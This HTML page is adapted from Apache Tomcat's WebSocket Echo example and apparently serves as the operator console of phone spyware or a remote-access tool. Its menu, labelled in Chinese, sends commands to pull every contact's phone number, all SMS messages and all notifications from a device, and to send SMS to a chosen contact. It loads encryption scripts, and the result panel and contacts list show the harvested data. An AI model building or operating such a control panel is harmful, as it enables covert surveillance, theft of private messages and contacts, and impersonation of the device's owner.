<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset="UTF-8" />

    <title>Apache Tomcat WebSocket Examples: Echo</title>
    <style type="text/css">
        #connect-container {
            float: left;
            width: 400px
        }

        #connect-container div {
            padding: 5px;
        }

        #console-container {
            margin-left: 400px;
            width: 400px;
        }

        #result-tips {
            font-size: 20px;
        }

        #console {
            border: 1px solid #CCCCCC;
            border-right-color: #999999;
            border-bottom-color: #999999;
            
            overflow-y: scroll;
           
            width: 100%;
            height: 550px;
        }

        #console p {
            padding: 0;
            margin: 0;
        }

        .left {
            float: left;
            width:900px;"
        }

        .right {
            width:150px;
            margin-left: 920px;
        }

        #radiolist {
            border: 1px solid #CCCCCC;
            overflow-y: scroll;
            height: 550px;
        }
    </style> 
    <script src = "../js/aes.js"></script>
    <script src = "../js/pad-nopadding-min.js"></script>
    <script src = "../js/jquery-1.11.1.min.js"></script>
  <script src = "../js/pa.js"></script>
</head>
<body bgcolor="#f5f5f5">
<noscript><h2 style="color: #ff0000">Seems your browser doesn't support Javascript! Websockets rely on Javascript being enabled. Please enable
    Javascript and reload this page!</h2></noscript>
<div>
<div class="left">
    <div id="connect-container">
         <div>
            <!--<span>Connect using:</span>  -->
            <!-- echo example using streams on the server side
            <input id="radio1" type="radio" name="group1" value="/examples/websocket/echoStream"
                   onclick="updateTarget(this.value);"> <label for="radio1">streams</label>   -->
            <!-- echo example using messages on the server side
            <input id="radio2" type="radio" name="group1" value="/examples/websocket/echoMessage"
                   onclick="updateTarget(this.value);"> <label for="radio2">messages</label>-->
         </div>


         <div>
            <input id="target" type="text" size="40" style="width: 350px; display:none"/>
         </div>


        <div>
           <!-- <button id="connect" onclick="connect();">Connect</button>
            <button id="disconnect" disabled="disabled" onclick="disconnect();">Disconnect</button> -->
        </div>


        <div>
            <span><b>Console Menu.</b></span><br><br>
             <input id="cmd1" type="radio" name="menu" value="1" onclick="SendCommand(this.value);"> <label for="cmd1">获取全部联系人电话</label><br><br>
                   <input id="cmd2" type="radio" name="menu" value="2" onclick="SendCommand(this.value);"> <label for="cmd2">获取所有手机SMS</label><br><br>
                   <input id="cmd4" type="radio" name="menu" value="3" onclick="SendCommand(this.value);"> <label for="cmd3">指定联系人发送SMS</label><br><br>
                   <input id="cmd5" type="radio" name="menu" value="4" onclick="SendCommand(this.value);"> <label for="cmd4">获取所有Notification信息</label><br><br>
        </div>

        <br>

        <div>
            <span>Send Message to somebody</span><br>
             <br>  <textarea id="phonenumber" style="width: 80%; height:20px" >input phoneNumber</textarea>
            <br>  <textarea id="message" style="width: 80%; height:200px" >input message</textarea>
        </div>

        <div>
            <button id="echo" onclick="echo();" disabled="disabled">send cmd</button>
        </div>

    </div>

    <div id="console-container">
        <span id="result-tips">Result:</span>
        <div id="console"></div>
		 <div> <button id="clear" onclick="clear()" >clear the console</button> </div>
    </div>
</div>

<div class="right">
    <span id="result-tips">Contacts list:</span>
    <div id="radiolist">
    </div>
</div>

</div>

<A href="" name="redirect" id = "redirect"> </A>

</body>
</html>